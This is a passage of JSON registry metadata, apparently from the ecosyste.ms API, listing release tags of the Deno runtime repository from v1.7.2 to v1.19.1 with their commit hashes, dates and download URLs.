.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@